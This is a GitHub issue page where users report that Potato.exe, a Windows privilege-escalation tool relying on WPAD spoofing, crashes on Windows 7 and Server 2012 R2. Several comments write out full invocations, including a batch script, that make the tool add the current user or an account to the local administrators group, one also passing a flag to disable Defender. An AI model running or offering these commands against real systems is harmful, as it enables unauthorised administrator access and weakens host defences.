-
Notifications
You must be signed in to change notification settings - Fork 164
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Potato.exe have stopped working #3
Comments
Bump. Thanks! same here win7 ultimate with admin or without. both crash on all bins of potato.exe as of 05/24/2016 `@echo off FOR /f "tokens=1 delims=:" %%d IN ('ping %computername% -4 -n 1 ^| find /i "reply"') do (FOR /F "tokens=3 delims= " %%g IN ("%%d") DO set ip_address=%%g) echo "Windows 7" Potato.exe -ip %ip_address% -cmd "c:\windows\System32\cmd.exe /K net localgroup administrators %USERNAME% /add" -disable_exhaust true echo "Windows Server 2008" echo "Windows 8/10/Server 2012 This takes 24 hrs or hack date " ` |
Also crash on Windows 2012 R2
|
Mine crashes on "public byte[] InitSecContext(byte[] token, int offset, int len)" function of SharpCifs. |
Hello, I'have download the Potato-master, and i'm trying to run it on Windows Server 2012 R2.
The command that I'm using:
Potato.exe -ip 172.16.21.89 -cmd "C:\Windows\System32\cmd.exe /K net localgroup administrators project /add" -disable_exhaust true -disable_defender true
Now the IP (of the system that running the potato.exe) & the account name "project" are correct, and every time when the programs says "Spoofed Target WPAD succesfully..." the Windows Server pop a "Potato.exe have stopped working".
The text was updated successfully, but these errors were encountered: